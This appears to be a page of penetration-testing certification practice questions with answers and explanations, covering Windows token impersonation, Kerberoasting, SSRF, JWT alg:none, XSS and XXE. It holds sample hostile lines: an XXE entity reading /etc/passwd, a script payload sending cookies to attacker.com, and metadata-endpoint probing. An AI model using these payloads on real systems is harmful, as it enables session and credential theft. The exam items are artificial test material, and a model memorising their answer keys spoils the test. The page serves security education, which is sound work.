XXE injection is correct because the vulnerability arises from the XML parser processing an external entity defined in the DOCTYPE declaration. An attacker can use a crafted XML payload with an entity like <!ENTITY xxe SYSTEM "file:///etc/passwd"> to read sensitive files, perform internal port scans, or trigger network requests. The root cause is the application's insecure handling of XML external entities, which is the defining characteristic of XXE.

Why this answer

XML External Entity (XXE) injection allows reading files or performing SSRF via XML processing.

119
MCQmedium

A tester has gained a low-privilege shell on a Windows machine and found that the user has the SeImpersonatePrivilege enabled. Which attack can be used to escalate privileges to SYSTEM?

A.DLL hijacking
B.Kerberoasting
C.Token impersonation using PrintSpoofer
D.AlwaysInstallElevated
AnswerC

Token impersonation using PrintSpoofer is a powerful privilege escalation technique that exploits the Print Spooler service's named pipe to manipulate an impersonation token and execute commands with SYSTEM privileges. The tool leverages the SeImpersonatePrivilege, which is typically granted to service accounts (e.g., IIS, MSSQL) but is not normally enabled for standard low-privilege users; however, when the current process holds this privilege, PrintSpoofer can request a token from the Spooler that represents the SYSTEM account and then impersonate it. This method does not require write access to system directories, domain credentials, or specific Group Policy settings, making it a direct and reliable path to SYSTEM escalation in this scenario, hence the correct answer.

Why this answer

SeImpersonatePrivilege allows impersonating a client after authentication; tools like PrintSpoofer, RoguePotato exploit this to gain SYSTEM.

120
MCQmedium

A penetration tester is conducting a wireless assessment and has captured a WPA2 handshake. The tester wants to crack the pre-shared key (PSK) offline. Which of the following tools is specifically designed to perform this task?

A.Reaver
B.Wifite
C.Aircrack-ng
D.Kismet
AnswerC

Aircrack-ng is a suite of tools for wireless network auditing, and its aircrack-ng component is specifically designed to crack WEP and WPA/WPA2 PSK keys from captured handshakes. It uses a wordlist or brute-force to compute the pairwise master key (PMK) and verify it against the captured handshake. This makes it the correct tool for offline WPA2 PSK cracking in this scenario.

Why this answer

Aircrack-ng is the standard tool for offline cracking of WPA/WPA2 PSK handshakes. It takes a capture file containing the four-way handshake and a wordlist, computes the PMK for each candidate password, and compares it to the captured handshake to find the correct PSK. Kismet is for detection, Wifite is an automation wrapper, and Reaver targets WPS, so aircrack-ng is the correct choice.

Exam trap

The trap here is confusing wireless capture or automation tools with the actual cracking engine, or mixing up WPS attacks with PSK handshake cracking.

121
MCQeasy

During a penetration test, you run the following command on a Linux target: `find / -type f -perm /4000 2>/dev/null`. What are you attempting to identify?

A.World-writable files
B.SUID binaries
C.Files with extended attributes
D.SGID binaries
AnswerB

This is the correct answer because `-perm /4000` instructs `find` to locate any file where the set-user-ID (SUID) permission bit is set, regardless of other permission bits. In octal, 4000 corresponds specifically to the SUID bit, and the leading `/` means 'any of these bits' (here just 4000). When a binary has SUID set, it executes with the file owner's privileges, which makes SUID binaries a high-priority target for privilege escalation during a penetration test.

Why this answer

The find command with -perm /4000 searches for files with SUID bit set, which can be exploited for privilege escalation.

122
MCQhard

During an internal assessment, a penetration tester captures Kerberos traffic and identifies a service account whose SPN is registered but whose password was set years ago and never rotated. The tester wants to request a service ticket offline and crack it to recover the plaintext password. Which technique is the tester performing?

A.Kerberoasting, by requesting a TGS for the SPN and cracking the RC4-HMAC encrypted portion offline
B.AS-REP roasting, by sending an AS-REQ without pre-authentication for a targeted account
C.Golden Ticket creation, by forging a TGT with the KRBTGT account hash
D.Pass-the-ticket, by injecting a stolen TGS into the current session for lateral movement
AnswerA

Kerberoasting requests a service ticket (TGS) for a registered SPN using any authenticated domain user. The ticket's encrypted portion is protected with the service account's long-term key, so the tester can extract it and crack it offline to recover the plaintext password. The stale, never-rotated password described in the scenario is exactly the condition that makes this attack productive.

Why this answer

Kerberoasting exploits the fact that any authenticated user may request a service ticket for a registered SPN, and the returned TGS is encrypted with the service account's key. Extracting and cracking that encrypted blob offline yields the plaintext password. The long-lived, unrotated password in the scenario is the classic enabling condition, making this the correct identification.

Exam trap

The trap here is confusing offline service-ticket cracking with AS-REP roasting, which instead depends on accounts that have Kerberos pre-authentication disabled.

123
MCQmedium

A tester wants to perform a Kerberoasting attack against an Active Directory domain. The tester has a domain account with no special privileges. Which of the following is required to successfully request TGS tickets for offline cracking?

A.The service account's password hash
B.A valid domain user account
C.Administrator privileges on a domain controller
D.Local administrator access on a client machine
AnswerB

A valid domain user account is the only prerequisite because Kerberos allows any authenticated domain user to request service tickets for any SPN via the TGS-REQ process. The TGS ticket returned is encrypted with the service account's password hash, so the attacker receives the ciphertext needed for offline cracking. This works with standard user privileges, making the attack low-cost and widely applicable once a single low-level account is compromised.

Why this answer

Kerberoasting requires a valid domain account to request TGS tickets for service accounts. No special privileges are needed beyond being authenticated. AS-REP roasting targets users without pre-authentication, not service accounts.

124
MCQmedium

During a web application test, the tester uses sqlmap and identifies a time-based blind SQL injection. Which technique is sqlmap using to extract data?

A.Error-based SQL injection
B.Boolean-based blind SQL injection
C.UNION-based SQL injection
D.Time-based blind SQL injection
AnswerD

Time-based blind SQL injection is the correct answer because the tester can extract data by injecting conditional expressions that invoke database delay functions, such as `IF(condition, SLEEP(5), 0)` in MySQL or `WAITFOR DELAY '0:0:5'` in MSSQL, and then measuring the application's response time. Sqlmap automatically generates these payloads and uses a statistical threshold to distinguish between true and false conditions based on elapsed time, making it effective when no error messages or content changes are visible. This aligns perfectly with the scenario where the tester used sqlmap and observed time-based behavior.

Why this answer

Time-based blind SQL injection uses conditional delays to infer the truth of queries based on response time.

125
MCQeasy

In Metasploit, after searching for an exploit, you select it with 'use exploit/...' and set required options. What is the final command to execute the exploit against the target?

A.execute
B.launch
C.start
D.run
AnswerD

'run' is the correct command to initiate a selected Metasploit exploit. It is also an alias for 'exploit', but 'run' is more versatile and works for both exploit and auxiliary modules. After setting required options like RHOSTS, RPORT, and PAYLOAD, the 'run' command executes the module and establishes the attack as configured. This command is essential in interactive use and in resource scripts for automation.

Why this answer

The 'run' or 'exploit' command launches the exploit.

126
MCQmedium

While performing a web application penetration test, a tester observes that the application reflects user input in the page without proper sanitization. To steal session cookies, the tester crafts a payload like <script>document.location='http://attacker.com/?cookie='+document.cookie</script>. Which XSS type is this?

A.Stored XSS
B.Reflected XSS
C.DOM-based XSS
D.SQL injection
AnswerB

Reflected XSS is correct because the injected script travels in the HTTP request—for example, inside a query string, form parameter, or URL fragment—and the server immediately reflects it in the HTTP response without proper sanitization, causing the browser to execute it. Since the payload is not persisted, the attacker typically crafts a malicious link with the payload embedded and tricks the victim into clicking it, making non-persistent delivery the defining characteristic that matches the observed behavior.

Why this answer

Reflected XSS occurs when the injected script is reflected off the web server immediately.

127
MCQhard

A tester is exploiting a Linux system and finds a binary with the SUID bit set owned by root. The binary executes other commands. Which technique would allow privilege escalation to root?

A.DLL hijacking
B.Kernel exploit
C.Token impersonation
D.PATH manipulation
AnswerD

When a SUID binary executes an external command using a relative path, such as calling system('ls') or execvp('ls', ...), it relies on the PATH environment variable set by the invoking user. An attacker can prepend a custom directory to PATH containing a malicious executable with the name of the expected command; since the SUID binary runs with root privileges, the malicious executable executes with root privileges, granting privilege escalation. The exploit succeeds only if the binary does not sanitize the environment (e.g., via secure_getenv) and uses a relative path instead of an absolute path. This is precisely the described scenario, making PATH manipulation the correct answer.

Why this answer

If a SUID binary executes commands (e.g., via system() or exec()), it may be exploited to run arbitrary commands as root, especially if the path is not absolute.

128
MCQhard

During a Windows privilege escalation attempt, a tester finds that the current user has the SeImpersonatePrivilege enabled. Which tool can be used to exploit this privilege to gain SYSTEM access?

A.PrintSpoofer
B.PowerUp
C.CrackMapExec
D.Mimikatz
AnswerA

PrintSpoofer exploits SeImpersonatePrivilege by coercing a privileged process to connect to a named pipe it controls, then impersonating the resulting token to gain SYSTEM. It satisfies the stem's Windows local escalation constraint directly, unlike token-stealing tools that require existing high-integrity tokens or kernel exploits.

Why this answer

PrintSpoofer exploits the SeImpersonatePrivilege by abusing the Windows Print Spooler service's named pipe (\\.\pipe\spoolss) to coerce a SYSTEM-level token and impersonate it, yielding NT AUTHORITY\SYSTEM. It is specifically designed for the SeImpersonatePrivilege/SeAssignPrimaryTokenPrivilege abuse class (alongside JuicyPotato, RoguePotato, and GodPotato). Because the question explicitly names SeImpersonatePrivilege, PrintSpoofer is the direct match.

Exam trap

PT0-003 often tests the mapping between a specific Windows privilege (SeImpersonatePrivilege, SeBackupPrivilege, SeDebugPrivilege) and the exact tool that abuses it — candidates confuse general-purpose tools like Mimikatz or PowerUp with the token-impersonation exploiters (PrintSpoofer, JuicyPotato, RoguePotato).

How to eliminate wrong answers

Option B is wrong because PowerUp is a PowerShell privilege-escalation enumeration and misconfiguration-abuse script (unquoted service paths, weak service permissions, AlwaysInstallElevated) — it does not weaponize SeImpersonatePrivilege. Option C is wrong because CrackMapExec is a post-exploitation lateral-movement and SMB/WinRM spraying framework, not a local token-impersonation exploit. Option D is wrong because Mimikatz is a credential-extraction and Kerberos-abuse tool (sekurlsa, DCSync, golden tickets); while it can perform token manipulation, it is not the tool used to exploit SeImpersonatePrivilege for SYSTEM escalation.

129
Multi-Selectmedium

During a Windows privilege escalation attempt, the tester finds that the current user has SeImpersonatePrivilege enabled. Which THREE tools or techniques can be used to exploit this privilege?

Select 3 answers
A.JuicyPotato
B.Mimikatz
C.RoguePotato
D.PrintSpoofer
E.PowerUp
AnswersA, C, D

JuicyPotato is a refined implementation of the Rotten Potato attack that abuses SeImpersonatePrivilege by leveraging COM object activation. It uses a DCOM server to trigger an NTLM authentication using the machine account, then duplicates the resulting token to execute arbitrary commands with SYSTEM integrity. This tool made the attack practical on Windows Server 2016 and later, although some methods were patched in current builds.

Why this answer

PrintSpoofer, RoguePotato, and JuicyPotato exploit SeImpersonatePrivilege to gain SYSTEM. Mimikatz is for credential dumping, and PowerUp is a PowerShell script for privilege escalation but not specific to this privilege.

130
MCQmedium

During a web application test, you discover an endpoint that accepts a URL parameter and fetches the content. You try `http://169.254.169.254/latest/meta-data/` and receive a response. Which vulnerability is this?

A.Cross-Site Request Forgery (CSRF)
B.Local File Inclusion (LFI)
C.Server-Side Request Forgery (SSRF)
D.XML External Entity (XXE)
AnswerC

Server-Side Request Forgery (SSRF) occurs when a web application fetches a user-supplied URL server-side without adequate validation, allowing the attacker to target internal hosts or cloud metadata services. In this scenario, the discovered endpoint likely accepts a URL and makes an HTTP request on behalf of the server, enabling the attacker to query 169.254.169.254/latest/meta-data/ and exfiltrate instance credentials. This matches the described behavior exactly: the server, not the user's browser, performs the request and returns the response to the attacker.

Why this answer

The IP 169.254.169.254 is the cloud metadata endpoint; accessing it indicates SSRF.

131
Multi-Selectmedium

A penetration tester is conducting a web application test and discovers a server-side request forgery (SSRF) vulnerability. The application accepts a URL parameter and fetches the resource. Which TWO of the following are common SSRF exploitation techniques?

Select 2 answers
A.Accessing the AWS metadata endpoint at 169.254.169.254
B.Scanning internal IP addresses and ports
C.Crafting a JavaScript payload for XSS
D.Injecting SQL queries into the URL
E.Forcing the server to send a POST request
AnswersA, B

Accessing the AWS metadata endpoint at 169.254.169.254 is a textbook SSRF technique because this link-local address is reachable only from within the cloud environment and provides IAM security credentials, user-data, and instance configuration when queried. By making the vulnerable server request this IP, an attacker can steal cloud role credentials and pivot into the target's AWS account. This usage directly demonstrates SSRF's core characteristic: the server is tricked into fetching an internal resource on the attacker's behalf.

Why this answer

SSRF can access internal services like cloud metadata endpoints and perform internal port scans.

132
MCQmedium

During an internal penetration test, you need to perform lateral movement to a Windows target. You have a plaintext password for a domain user account. Which tool would be most appropriate to authenticate to the target using WMI?

A.CrackMapExec
B.evil-winrm
C.wmiexec
D.psexec
AnswerC

wmiexec is the correct choice because it directly uses Windows Management Instrumentation (WMI) to execute commands remotely without needing to upload a binary or create a service. It connects to the target's WMI service over DCOM (typically port 135) and invokes the Win32_Process.Create method, which makes it lighter and less likely to trigger service-specific detection rules. This direct API-level approach is what distinguishes it from wrappers and alternatives that rely on other protocols or artifacts.

Why this answer

wmiexec (part of Impacket) allows execution of commands on a Windows host via WMI using valid credentials, suitable for lateral movement.

133
MCQhard

During a web application penetration test, the tester discovers a JWT token in the Authorization header. The token uses the 'none' algorithm. What attack should the tester attempt?

A.JWT algorithm confusion attack (alg:none)
B.JWT timing attack
C.JWT kid injection
D.JWT brute-force of the secret
AnswerA

In an alg:none attack, the tester modifies the JWT header to set the algorithm to 'none' and removes the signature from the token. If the server-side JWT library is misconfigured to accept the 'none' algorithm or fails to enforce an explicit algorithm allowlist, it will treat the token as valid without verifying any cryptographic signature. This effectively bypasses integrity checks and allows the attacker to forge arbitrary claims, making it a true algorithm confusion vulnerability.

Why this answer

If the server accepts the 'none' algorithm, the tester can forge tokens by setting the algorithm to 'none' and removing the signature.

134
MCQmedium

After compromising a Windows workstation, the tester wants to extract password hashes from the local SAM database. Which Metasploit meterpreter command should be used?

A.getsystem
B.getuid
C.shell
D.hashdump
AnswerD

The hashdump command is the correct choice because it directly extracts the NTLM password hashes from the SAM database on a Windows target when run in Meterpreter (typically after gaining SYSTEM privileges). It does this by copying the SAM and SYSTEM registry hives, decrypting the hash material with the SYSKEY from the SYSTEM hive, and presenting the hashes in a format ready for offline cracking. This command is specifically designed for dumping local user password hashes, fulfilling the tester's objective immediately. While it may require 'getsystem' first, hashdump itself is the actual dumping action.

Why this answer

hashdump dumps the SAM database hashes.

135
MCQhard

During a penetration test, the tester gains a Meterpreter session on a Windows target and wants to escalate privileges to SYSTEM. The current user has the SeImpersonatePrivilege token. Which tool should the tester use to exploit this privilege?

A.PrintSpoofer
B.Windows-Exploit-Suggester
C.whoami /priv
D.Mimikatz
AnswerA

PrintSpoofer directly weaponizes SeImpersonatePrivilege: it creates a named pipe and abuses the Windows Print Spooler service to make a SYSTEM-level client connect and impersonate its token. Meterpreter sessions running as a service account with this privilege can use PrintSpoofer to instantly spawn a SYSTEM shell. Unlike suggestion or enumeration tools, it performs the actual privilege escalation, so it is the correct choice for this scenario.

Why this answer

PrintSpoofer exploits the SeImpersonatePrivilege to impersonate SYSTEM tokens.

136
MCQhard

During a web application test, the tester discovers that the application uses JSON Web Tokens (JWT) for authentication. The tester modifies the JWT header to set the algorithm to 'none' and removes the signature. The server accepts the token. What type of attack is this?

A.JWT algorithm confusion (alg:none)
B.JWT injection
C.JWT session stealing
D.JWT secret brute-force
AnswerA

This is a JWT algorithm confusion attack where the attacker modifies the JWT header to set the `alg` field to `none`, removing the signature entirely. If the server's JWT library naively trusts the header and skips signature verification for `alg:none`, the attacker can forge arbitrary tokens and impersonate any user. Modern libraries should enforce an explicit algorithm allowlist, but misconfigured legacy systems remain vulnerable.

Why this answer

Setting the JWT algorithm to 'none' exploits a misconfiguration where the server does not enforce signature verification, leading to JWT algorithm confusion.

137
Multi-Selectmedium

A penetration tester is performing a Kerberoasting attack. Which TWO steps are required for a successful Kerberoasting attack?

Select 2 answers
A.Enumerate domain admins
B.Request TGS tickets for service accounts
C.Perform a relay attack
D.Crack the TGS tickets offline using Hashcat
E.Capture NTLMv2 hashes using Responder
AnswersB, D

Kerberoasting begins with an authenticated user requesting TGS tickets for accounts that have SPNs registered, typically via tools like Rubeus or GetUserSPNs. The returned ticket is encrypted with the target service account's NTLM hash, so capturing these tickets yields a hash that can be cracked offline without any further network interaction. This step is the core of the attack because it obtains the password hash in an extractable format, and it works with only standard domain credentials.

Why this answer

Kerberoasting involves requesting TGS tickets for service accounts and then cracking the tickets offline.

138
MCQmedium

You are testing a web application and notice that it uses JSON Web Tokens (JWT) for authentication. You change the algorithm to 'none' and remove the signature, and the token is accepted. Which JWT vulnerability did you exploit?

A.KID injection
B.Algorithm none attack
C.Weak secret brute-force
D.Token replay
AnswerB

In an algorithm none attack, the attacker modifies the JWT header to set 'alg':'none' and strips the signature segment, causing a vulnerable server to accept the token without cryptographic verification. Many JWT libraries only execute signature verification for asymmetric or HMAC algorithms and skip it entirely when alg is 'none' unless explicitly forbidden. This directly matches the observation of bypassing signature verification, so it is the correct answer.

Why this answer

Alg:none attack exploits weak validation that accepts unsigned tokens.

139
MCQmedium

A tester is performing a privilege escalation on a Windows system and finds that the user has SeImpersonatePrivilege enabled. Which tool could be used to escalate to SYSTEM?

A.PsExec
B.PrintSpoofer
C.evil-winrm
D.pth-winexe
AnswerB

PrintSpoofer is a local privilege escalation tool that exploits SeImpersonatePrivilege, a Windows privilege often held by service accounts. It leverages the Print Spooler service by creating a named pipe and tricking the spooler into connecting to it, allowing the attacker to impersonate a SYSTEM token. This enables command execution as SYSTEM without requiring remote credentials or network services.

Why this answer

SeImpersonatePrivilege can be exploited using tools like PrintSpoofer or Potato attacks to impersonate SYSTEM tokens.

140
MCQhard

You have obtained a NTLM hash of a domain admin account and want to authenticate to a remote server without cracking the password. Which technique enables you to authenticate using the hash?

A.Pass-the-Hash
B.AS-REP roasting
C.Pass-the-Ticket
D.Kerberoasting
AnswerA

Pass-the-Hash (PtH) allows an attacker to authenticate to remote systems by supplying the NTLM hash directly instead of the plaintext password. Because NTLM challenge-response authentication uses the hash as the shared secret, the hash is sufficient to impersonate the user without cracking it. This technique is commonly exploited against SMB and other NTLM-authenticating services, making it the direct and correct use of an obtained NTLM hash.

Why this answer

Pass-the-hash uses the NTLM hash directly to authenticate without needing the plaintext password. Tools like pth-winexe or CrackMapExec can perform this.

141
MCQeasy

Which Metasploit command is used to display information about the current meterpreter session, including the target OS and user?

A.hashdump
B.getuid
C.getsystem
D.sysinfo
AnswerD

sysinfo is the correct Meterpreter command for system reconnaissance, as it displays the target operating system version, computer name, architecture (e.g., x64 or x86), and sometimes the Meterpreter payload type and domain. This information lets a penetration tester choose compatible exploits, payloads, or enumeration modules, and it is the first logical step after gaining a session.

Why this answer

The 'sysinfo' meterpreter command displays system information such as OS, architecture, and sometimes user context.

142
MCQhard

During a penetration test, you successfully execute a Meterpreter session on a Windows target. You want to dump password hashes from the SAM database. Which Meterpreter command should you use?

A.getsystem
B.hashdump
C.getuid
D.sysinfo
AnswerB

hashdump is a Meterpreter command that reads the Local Security Authority (LSA) secrets and the Security Account Manager (SAM) registry hive from the target system, extracting the NTLM hashes of local user account passwords. It requires SYSTEM privileges to successfully read the SAM database, and it outputs the username, RID, LM hash, and NTLM hash for each account. This is the direct and intended method to dump password hashes from a Windows system, making it the correct answer.

Why this answer

hashdump is the Meterpreter command to dump SAM hashes.

143
MCQmedium

A penetration tester has gained a low-privilege shell on a Windows server and discovers the user has the SeImpersonatePrivilege. Which tool could the tester use to escalate privileges to SYSTEM?

A.Mimikatz
B.SharpHound
C.PowerUp
D.PrintSpoofer
AnswerD

PrintSpoofer is a token impersonation exploit that specifically leverages SeImpersonatePrivilege by creating a malicious named pipe server and then coercing a privileged process—commonly the Print Spooler service—to connect to it. The tool captures the resulting SYSTEM token and uses ImpersonateNamedPipeClient to execute a command with elevated privileges, giving the attacker a SYSTEM shell. It is designed as a modern replacement for JuicyPotato, working reliably on fully patched Windows 10 and Server 2019 builds where older Potato exploits often fail, making it the correct choice.

Why this answer

PrintSpoofer exploits SeImpersonatePrivilege to escalate privileges on Windows.

144
MCQmedium

During a Windows privilege escalation attempt, the tester finds that the current user has the SeImpersonatePrivilege enabled. Which tool is commonly used to exploit this privilege to gain SYSTEM?

A.PrintSpoofer
B.SharpUp
C.Mimikatz
D.PowerUp
AnswerA

PrintSpoofer exploits SeImpersonatePrivilege by coercing a privileged process to authenticate against a named pipe it controls, then impersonating the resulting token to obtain SYSTEM. It targets Windows 10 and Server 2019+, where Rotten Potato techniques fail, satisfying the scenario's requirement for a working SeImpersonate escalation path.

Why this answer

PrintSpoofer exploits SeImpersonatePrivilege to impersonate SYSTEM and spawn a shell.

145
MCQmedium

During a Linux privilege escalation attempt, a tester finds a binary with the SUID bit set that is not on the GTFOBins list. The binary executes /bin/bash with the effective UID of root. What is the most likely way to exploit this?

A.Use GTFOBins to find a suitable exploit
B.Perform a buffer overflow on the binary
C.Run the binary with the -p flag
D.Modify the PATH to include a fake binary
AnswerC

When a SUID root binary executes /bin/bash, the kernel sets the effective UID to 0, but Bash normally resets the effective UID to the real UID to prevent privilege abuse. Running the binary with the -p flag forces Bash into privileged mode, preventing that reset and keeping the effective UID at 0. This yields a root shell with the user's real UID unchanged, making it the standard and direct privilege-escalation technique for SUID binaries that invoke a shell. The -p option is therefore the intended method to preserve the elevated privileges.

Why this answer

When an SUID binary executes /bin/bash, bash will drop the effective UID unless the -p (privileged) flag is used. Running the binary with '-p' preserves the effective UID, granting a root shell. Simply running the binary may result in a shell with the original user's privileges.

Exam trap

The -p flag is required to prevent bash from dropping the elevated privileges. Without it, the shell reverts to the real UID.

146
MCQeasy

A tester is attempting to crack WPA2 handshakes captured from a wireless network. Which hashcat mode should be used?

A.-m 13100
B.-m 1000
C.-m 0
D.-m 22000
AnswerD

Mode 22000 is the dedicated Hashcat format for WPA/WPA2, accepting both EAPOL and PMKID data from the four-way handshake. It replaces the older 2500 and 16800 modes and handles the PBKDF2-SHA1 key derivation to test passwords offline. When converting a .cap file with hcxpcapngtool, the resulting .hc22000 file is fed into Hashcat with -m 22000. This is the correct mode for cracking WPA2 handshakes.

Why this answer

Hashcat mode 22000 is used for WPA-PBKDF2-PMKID+EAPOL (WPA/WPA2) handshakes.

← PreviousPage 2 of 2 · 146 questions total

Ready to test yourself?

Try a timed practice session using only Attacks and Exploits questions.